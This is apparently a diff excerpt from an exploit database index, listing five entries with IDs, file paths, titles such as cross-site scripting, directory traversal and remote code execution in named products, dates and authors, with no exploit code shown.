 47491,exploits/hardware/webapps/47491.txt,"Intelbras Router WRN150 1.0.18 - Persistent Cross-Site Scripting",2019-10-11,"Prof. Joas Antonio",webapps,hardware,
 47492,exploits/php/webapps/47492.rb,"WordPress Arforms 3.7.1 - Directory Traversal",2019-10-11,"Ahmad Almorabea",webapps,php,
+47496,exploits/php/webapps/47496.txt,"Express Invoice 7.12 - 'Customer' Persistent Cross-Site Scripting",2019-10-14,"Debashis Pal",webapps,php,
+47497,exploits/python/webapps/47497.py,"Ajenti 2.1.31 - Remote Code Execution",2019-10-14,"Jeremy Brown",webapps,python,
+47498,exploits/php/webapps/47498.txt,"Kirona-DRS 5.5.3.5 - Information Disclosure",2019-10-14,Ramikan,webapps,php,